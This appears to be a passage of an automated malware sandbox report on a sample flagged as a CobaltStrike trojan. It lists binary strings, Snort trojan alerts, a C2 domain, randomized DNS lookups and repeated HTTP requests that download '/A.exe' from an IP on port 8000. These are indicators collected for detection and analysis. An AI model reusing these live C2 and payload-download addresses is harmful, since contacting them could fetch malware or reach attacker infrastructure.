        Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4469560551.0000000007612000.00000002.00000001.01000000.00000020.sdmp
        Source: Binary string: D:\a\QRCoder\QRCoder\QRCoder.Xaml\obj\Release\net40\QRCoder.Xaml.pdbSHA256o3 source: QRCoder.Xaml.dll.6.dr
        Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdb source: System.Security.Permissions.dll.6.dr
        Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4458477595.0000000005EB2000.00000002.00000001.01000000.00000017.sdmp
        Source: Binary string: /_/artifacts/obj/System.Collections.Immutable/net461-Release/System.Collections.Immutable.pdbSHA256M source: Anycast.exe, 0000002B.00000002.4464671863.0000000006DB2000.00000002.00000001.01000000.0000001B.sdmp, System.Collections.Immutable.dll.6.dr
        Source: Binary string: Hardcodet.NotifyIcon.Wpf.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4466233439.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp
        Source: Binary string: Sentry.pdbSHA2569 source: Anycast.exe, 0000002B.00000002.4458091074.0000000005AE2000.00000002.00000001.01000000.00000015.sdmp
        Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF8B805A9D8 FindFirstFileExW,0_2_00007FF8B805A9D8
        Source: C:\Users\Public\111.exeCode function: 6_2_0040676F FindFirstFileW,FindClose,6_2_0040676F
        Source: C:\Users\Public\111.exeCode function: 6_2_00405B23 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405B23
        Source: C:\Users\Public\111.exeCode function: 6_2_00402902 FindFirstFileW,6_2_00402902
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8028AC8 FindFirstFileExW,34_2_00007FF8B8028AC8

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2805877 ETPRO TROJAN W32.Virut.CF exe request 192.168.2.5:49705 -> 149.28.222.244:8000
        Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49705 -> 149.28.222.244:8000
        Source: TrafficSnort IDS: 2805877 ETPRO TROJAN W32.Virut.CF exe request 192.168.2.5:49706 -> 149.28.222.244:8000
        Source: TrafficSnort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49706 -> 149.28.222.244:8000
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\rundll32.exeNetwork Connect: 149.28.222.244 8000Jump to behavior
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: www.mxilws.buzz
        Queries random domain names (often used to prevent blacklisting and sinkholes)
        Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
        Tries to resolve many domain names, but no domain seems valid
        Source: unknownDNS traffic detected: query: rswqoikbsmpyvqzb.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: osjuvyiozchfdhzu.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: lfiovsnzjswbcjxl.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: slgbjnlbgjenrrqf.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: mcnbjggvtqykmrmm.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: cthvfbxnofkmrcdd.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: grkhaqesqkpwfbzj.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: avczmdgfxudkmncz.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: oqpgvpsfvcymxcwe.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: rjwdtpqwqloqrvxg.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: tbpbvxvlvcmlgnba.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: aylnalepiqttafwj.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: kebynwagdqnulxdh.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: www.mxilws.buzz replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: hemcxhvmjmsyrmhj.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: xztkcmlcydhxptoa.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: zhhxulpbjunysdxu.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: xoodjwtrxuhqrdmy.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: ecvfcdsyejuovapu.test.dnscrypt replaycode: Name error (3)
        Source: unknownDNS traffic detected: query: wttxkeqiublzfbuk.test.dnscrypt replaycode: Name error (3)
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49707
        Source: unknownNetwork traffic detected: IP country count 27
        Source: global trafficTCP traffic: 192.168.2.5:49705 -> 149.28.222.244:8000
        Source: global trafficHTTP traffic detected: GET /list.txt HTTP/1.1Cache-Control: no-cacheHost: list-cn-1304018649.cos.accelerate.myqcloud.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /config HTTP/1.1Accept: application/jsonAppPlatform: windowsAppVersion: 1.0AppBuild: 24AppLocale: en_USContent-Type: application/json; charset=utf-8Host: api.fengyunyizu.comContent-Length: 2Expect: 100-continueConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /app_update HTTP/1.1Accept: application/jsonAppPlatform: windowsAppVersion: 1.0AppBuild: 24AppLocale: en_USContent-Type: application/json; charset=utf-8Host: api.jianghumeng.netContent-Length: 2Expect: 100-continueConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: unknownTCP traffic detected without corresponding DNS query: 149.28.222.244
        Source: global trafficHTTP traffic detected: GET /DNSCrypt/dnscrypt-resolvers/master/v2/public-resolvers.md HTTP/1.1Host: raw.githubusercontent.comUser-Agent: dnscrypt-proxyCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /DNSCrypt/dnscrypt-resolvers/master/v2/public-resolvers.md.minisig HTTP/1.1Host: raw.githubusercontent.comUser-Agent: dnscrypt-proxyCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /DNSCrypt/dnscrypt-resolvers/master/v2/relays.md HTTP/1.1Host: raw.githubusercontent.comUser-Agent: dnscrypt-proxyCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /DNSCrypt/dnscrypt-resolvers/master/v2/relays.md.minisig HTTP/1.1Host: raw.githubusercontent.comUser-Agent: dnscrypt-proxyCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABCTkjVodOxrEqOJKzoqINSq HTTP/1.1Host: doh.ffmuc.netUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /dns-query?dns=yv4BAAABAAAAAAABEHB0bWVkZHRndHNmZHFwd2YEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQK5V0BBhEBZ8Md1B7OJ0HFA HTTP/1.1Host: doh.ffmuc.netUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /list.txt HTTP/1.1Cache-Control: no-cacheHost: list-cn-1304018649.cos.accelerate.myqcloud.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABAgfDFtmH4pThl8Z-RLHdij HTTP/1.1Host: doh.bortzmeyer.frUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABASsHmWthzMiYQ7PIk3hwOv HTTP/1.1Host: kronos.plan9-dns.comUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABDJqhldaBl4kWd-M_WSVkm7 HTTP/1.1Host: doh.crypto.sxUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /dns-query?dns=yv4BAAABAAAAAAABEGNra215cXZveGpwZHh4ZXEEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQDt0GKHhHtLhiC_vFFWAAwQ HTTP/1.1Host: doh.crypto.sxUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /uncensored?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABBNfPoC5RoTTtsv3or0O7VP HTTP/1.1Host: freedns.controld.comUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /uncensored?dns=yv4BAAABAAAAAAABEHN2dGxyZ3d5dHVqcmJ1cWMEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQi6WE31TBzdqqVCvG8H3FAg HTTP/1.1Host: freedns.controld.comUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABBpaCGnh5SOGdhGb2mDf8Hb HTTP/1.1Host: pluton.plan9-dns.comUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /p0?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABDpF0cJ_0VMvb7WLNuwQljl HTTP/1.1Host: freedns.controld.comUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /p0?dns=yv4BAAABAAAAAAABEGJ0cmNlbW5sbmVlbGFwb3MEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQwS0OcQQgp7MPiuxloY_p2Q HTTP/1.1Host: freedns.controld.comUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABAXZ1-qPOYikVRQXyWeXjW8 HTTP/1.1Host: dns.njal.laUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /dns-query?dns=yv4BAAABAAAAAAABEGlxaGJvYWltYWZzZGlhcWUEdGVzdAhkbnNjcnlwdAAAAgABAAApEAAAAAAAABQADAAQ82Vwmw5wtmYq_A9KVysKOg HTTP/1.1Host: dns.njal.laUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /dns-query?dns=yv4BAAABAAAAAAABAAACAAEAACkQAAAAAAAAFAAMABBfji9BqSLQ5S3eeoEsgAEi HTTP/1.1Host: dns.mullvad.netUser-Agent: dnscrypt-proxyAccept: application/dns-messageCache-Control: max-stale
        Source: global trafficHTTP traffic detected: GET /A.exe HTTP/1.1User-Agent: DownloadHost: 149.28.222.244:8000Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /A.exe HTTP/1.1User-Agent: DownloadHost: 149.28.222.244:8000Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /A.exe HTTP/1.1User-Agent: DownloadHost: 149.28.222.244:8000Cache-Control: no-cache
        Source: unknownDNS traffic detected: queries for: www.mxilws.buzz
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: ecvfcdsyejuovapu.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: wttxkeqiublzfbuk.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: rswqoikbsmpyvqzb.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: xoodjwtrxuhqrdmy.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: mcnbjggvtqykmrmm.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: aylnalepiqttafwj.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: osjuvyiozchfdhzu.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: hemcxhvmjmsyrmhj.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: rjwdtpqwqloqrvxg.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: xztkcmlcydhxptoa.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: grkhaqesqkpwfbzj.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: lfiovsnzjswbcjxl.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: oqpgvpsfvcymxcwe.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: cthvfbxnofkmrcdd.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: slgbjnlbgjenrrqf.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: kebynwagdqnulxdh.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: zhhxulpbjunysdxu.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: avczmdgfxudkmncz.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name: tbpbvxvlvcmlgnba.test.dnscrypt
        Source: unknownDoH DNS queries detected: name:
        Source: unknownDoH DNS queries detected: name:
        Source: unknownHTTP traffic detected: POST /dns-query?body_hash=2d65b93645064218288e55ae10d8eae180b162f57527a4b5a99876168346e6b9 HTTP/1.1Host: dns10.quad9.net:443User-Agent: dnscrypt-proxyContent-Length: 48Accept: application/dns-messageCache-Control: max-staleContent-Type: application/dns-message
        Source: anycast-service.exe, 00000022.00000000.2136854681.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000022.00000002.2141658275.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000000.2148298336.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000002.2149618744.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000000.2151447915.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000002.2167398699.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000002.2305155014.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000000.2166163273.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://.css
        Source: anycast-service.exe, 00000022.00000000.2136854681.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000022.00000002.2141658275.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000000.2148298336.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000002.2149618744.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000000.2151447915.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000002.2167398699.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000002.2305155014.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000000.2166163273.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://.jpg
        Source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe.6.drString found in binary or memory: http://127.0.0.1:
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012147000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.0000000012108000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.000000001216A000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.toml.6.drString found in binary or memory: http://127.0.0.1:8888
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllString found in binary or memory: http://149.28.222.244:8000/A.exe
        Source: wintun.dll.6.dr, Newtonsoft.Json.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: wintun.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
        Source: dnscrypt-proxy.exe, 00000029.00000003.3419721560.00000000124E2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120E8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000122B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: wintun.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
        Source: wintun.dll.6.dr, Newtonsoft.Json.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000122B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt0
        Source: Newtonsoft.Json.dll.6.drString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
        Source: QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0
        Source: Anycast.exe, 0000002B.00000002.4453114817.0000000001B10000.00000004.00000020.00020000.00000000.sdmp, Anycast.exe.6.dr, 111.exe.4.drString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
        Source: Anycast.exe, 0000002B.00000002.4460636264.00000000069E0000.00000004.00000020.00020000.00000000.sdmp, Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
        Source: wintun.dll.6.dr, Newtonsoft.Json.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: dnscrypt-proxy.exe, 00000029.00000003.3419721560.00000000124E2000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4461565738.00000000124A8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000120E8000.00000004.00001000.00020000.00000000.sdmp, dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000122B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: wintun.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
        Source: Newtonsoft.Json.dll.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000122B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0F
        Source: wintun.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
        Source: Newtonsoft.Json.dll.6.drString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
        Source: wintun.dll.6.dr, Newtonsoft.Json.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: wintun.dll.6.dr, Newtonsoft.Json.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: wintun.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
        Source: dnscrypt-proxy.exe, 00000029.00000002.4455107844.00000000122B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0
        Source: Packet.dll.6.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
        Source: wintun.dll.6.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
        Source: Newtonsoft.Json.dll.6.drString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
        Source: wintun.dll.6.dr, Newtonsoft.Json.dll.6.dr, Packet.dll.6.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
        Source: Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
        Source: Anycast.exe, 0000002B.00000002.4460636264.00000000069E0000.00000004.00000020.00020000.00000000.sdmp, Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
        Source: Anycast.exe.6.dr, QRCoder.dll.6.dr, QRCoder.Xaml.dll.6.dr, 111.exe.4.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
        Source: Anycast.exe, 0000002B.00000002.4451525987.00000000017F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: Anycast.exe, 0000002B.00000002.4451525987.0000000001883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
        Source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe.6.drString found in binary or memory: http://hm2buy.com?
        Source: anycast-service.exe, 00000022.00000000.2136854681.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000022.00000002.2141658275.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000000.2148298336.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000024.00000002.2149618744.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000000.2151447915.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000025.00000002.2167398699.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000002.2305155014.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmp, anycast-service.exe, 00000026.00000000.2166163273.00007FF6ABE74000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://html4/loose.dtd
        Source: Newtonsoft.Json.dll.6.drString found in binary or memory: http://james.newtonking.com/projects/json
        Source: QRCoder.dll.6.drString found in binary or memory: http://maps.google.com/maps?q=
